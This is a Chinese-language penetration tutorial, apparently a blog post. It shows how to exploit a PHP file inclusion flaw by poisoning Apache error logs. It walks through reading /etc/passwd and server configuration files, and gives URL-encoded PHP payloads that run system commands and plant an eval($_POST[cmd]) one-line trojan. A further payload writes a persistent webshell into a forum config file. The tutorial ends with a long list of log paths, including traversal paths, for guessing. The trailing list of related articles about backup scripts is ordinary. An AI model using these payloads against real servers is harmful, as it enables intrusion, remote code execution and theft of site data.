滲透必備:linux下備份拿shell
比如說,在一個php存在包含漏洞就像這樣,存在一句php包含漏洞的語句
<? include($zizzy); ?> //包含變數$zizzy
你可以
http://xxx.com/z.php?zizzy=/etc/inetd.conf
http://xxx.com/z.php?zizzy=/proc/cpuinfo
http://xxx.com/z.php?zizzy=/etc/passwd
就可以利用包含語句來檢視一些系統環境和密碼檔檔案。
那麼關於日誌包含下面我們來看:
比如我們的Apache的服務器配置檔案位置在這裡
/usr/local/apache/conf/httpd.conf
那麼我們來包含一下httpd.conf,來看下路徑資訊什麼的
http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf
讀出Apache的配置資訊,這裡列出部分資訊。
<VirtualHost 218.63.89.2>
User #3
Group silver
ServerAdmin webmaster@xxx.com
DocumentRoot /home/virtual/www.xxx.com
ServerName www.xxx.com
ServerAlias xxx.com
ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
Alias /icons/ /home/virtual/www.xxx.com/icons
</VirtualHost>
而我們提交http://xxx.com/z.php?zizzy=/home … /logs/www-error_log
就可以讀出Apache的錯誤日誌記錄
[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not
exist: /home/virtual/www.xxx.com/hack.php
[Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
exist: /home/virtual/www.xxx.com/111111111.php
[Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
exist: /home/virtual/www.xxx.com/22222.php3
[Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/forum
[Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/blog
[Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/kkkkkkkk
而資料日誌/home/virtual/www.xxx.com/logs/www-access_log也是一樣的,一樣可以讀出來,只不過檔案會很大,那也沒意思測試下去了,那怎麼利用呢。
比如我們提交要提交這句,<?phpinfo();?> //檢視php的相關資訊
在這裡,我們只能提交URL編碼模式,因為我在測試中發現,<?的標記並不被記錄,只有轉換成URL編碼提交才會被完整記錄。
在這裡<%3Fphpinfo%28%29%3B%3F>這句就是轉換過了的<?phpinfo();?>,我們提交
http://www.xxx.com/<%3Fphpinfo%28%29%3B%3F>
這樣肯定會報出錯找不到頁面,而一出錯就被記在錯誤日誌裡了
http://xxx.com/z.php?zizzy=/home … /logs/www-error_log
這樣這個日誌檔案就被包含成了phpinfo的資訊,而回顯也就成了一個顯示php資訊的頁面。
如果可以的話(能夠執行系統命令,也就是safe_mode開著的時候),
這樣子也不錯,
<?system(“ls+-la+/home”);?> //執行命令列出home下的檔案列表,記得轉換為URL格式哦。
/home/
total 9
-rw-r–r– 1 www.xxx.com silver 55 Jan 20 23:01 about.php
drwxrwxrwx 4 www.xxx.com silver 4096 Jan 21 06:07 abc
-rw-r–r– 1 www.xxx.com silver 1438 Dec 3 07:39 index.php
-rwxrwxrwx 1 www.xxx.com silver 5709 Jan 21 20:05 show.php
-rw-r–r– 1 www.xxx.com silver 5936 Jan 18 01:37 admin.php
-rwxrwxrwx 1 www.xxx.com silver 5183 Jan 18 15:30 config.php3
-rw-rw-rw- 1 www.xxx.com silver 102229 Jan 21 23:18 info.txt
drwxr-xr-x 2 www.xxx.com silver 4096 Jan 8 16:03 backup
-rw-r–r– 1 www.xxx.com silver 7024 Dec 4 03:07 test.php
這樣就列出了home下的檔案
或者直接一句話木馬<?eval($_POST[cmd]);?>,
這樣轉換後就是<%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F> 這樣的格式。
我們提交
http://www.xxx.com/<%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F>
再用lanker的一句話木馬客戶端一連就OK了。
因為上面那個很不實際,我在測試中發現日誌動不動就是幾十兆,那樣玩起來也沒意思了。下面想的再深入一點也就是我們寫入一個很實際的webshell來用,也比上面那種慢的要死好很多。
比如還是這句一句話木馬
<?eval($_POST[cmd]);?>
到這裡你也許就想到了,這是個很不錯的辦法。接著看,如何寫入就成了個問題,用這句,
fopen開啟/home/virtual/www.xxx.com/forum/config.php這個檔案,然後寫入<?eval($_POST[cmd]);?>這個一句話木馬服務端語句。連起來表達成php語句就是
<?$fp=fopen(“/home/virtual/www.xxx.com/forum/config.php”,”w+”);fputs($fp,”<?eval($_POST[cmd]);?>”);
fclose($fp);?> //在config.php裡寫入一句木馬語句
我們提交這句,再讓Apache記錄到錯誤日誌裡,再包含就成功寫入shell,記得一定要轉換成URL格式才成功。
轉換為
<%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22<%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F>%22%29%3B
fclose%28%24fp%29%3B%3F>
我們提交
http://xxx.com/<%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22<%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F>%22%29%3Bfclose%28%24fp%29%3B%3F>
這樣就錯誤日誌裡就記錄下了這行寫入webshell的程式碼。
我們再來包含日誌,提交
http://xxx.com/z.php?zizzy=/home … /logs/www-error_log
這樣webshell就寫入成功了,config.php裡就寫入一句木馬語句
OK.
http://www.xxx.com/forum/config.php這個就成了我們的webshell
直接用lanker的客戶端一連,主機就是你的了。
PS:上面講的,前提是資料夾許可權必須可寫 ,一定要-rwxrwxrwx(777)才能繼續,這裡直接用上面列出的目錄來檢視。上面講的都是在知道日誌路徑的情況下的利用
其他的日誌路徑,你可以去猜,也可以參照這裡。
附:收集的一些日誌路徑
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
相關文章
- linux 下RMAN備份shell指令碼Linux指令碼
- Linux 平臺下 RMAN 全備 和 增量備份 shell 指令碼Linux指令碼
- Linux下透過FTP上傳資料備份LinuxFTP
- unix下透過ftp定時備份FTP
- Oracle備份及備份策略及基於Linux下 Oracle 備份策略(RMAN)OracleLinux
- LINUX 自動備份程式日誌(shell)Linux
- Linux 平臺下 Oracle 資料泵備份(expdp) SHELL 指令碼LinuxOracle指令碼
- [滲透&攻防] 三.資料庫之差異備份及Caidao利器資料庫AI
- Nocatalog 下的RMAN 增量備份 shell指令碼指令碼
- Linux下mysql備份 恢復LinuxMySql
- 34 個 常用 Linux Shell 指令碼,運維必備!Linux指令碼運維
- networker透過備用千兆網路備份
- Rman備份的shell指令碼指令碼
- shell入門基礎必備(轉)
- linux下oracle熱備份指令碼LinuxOracle指令碼
- 使用shell 指令碼備份資料指令碼
- mysql定時備份shell指令碼MySql指令碼
- ORACLE自動備份shell指令碼Oracle指令碼
- rman備份的shell指令碼(例子)指令碼
- mysqldump壓縮備份匯出匯入(含定期備份shell指令碼)MySql指令碼
- linux 備份策略Linux
- linux 備份svnLinux
- Linux下Mysql定時自動備份LinuxMySql
- LINUX下ORACLE增量備份的步驟LinuxOracle
- linux下rsync和tar增量備份梳理Linux
- 基於Linux下 Oracle 備份策略(RMAN)LinuxOracle
- Linux下MySQL的備份與還原LinuxMySql
- Linux入門必備Linux
- 開發者必備Linux命令Linux
- Linux系統配置檔案簡易shell備份指令碼Linux指令碼
- 站長必備:10個好用的 WordPress 備份外掛
- shell相關知識有哪些必備技能?Linux面試題分享Linux面試題
- RAC模式下的備份策略以及RMAN備份指令碼模式指令碼
- 線上透過dd命令備份分割槽
- Unix/Linux下,Oracle備份策略一例LinuxOracle
- linux 下的差異和增量備份(轉)Linux
- mysql每日備份for LinuxMySqlLinux
- 轉 Linux 備份策略Linux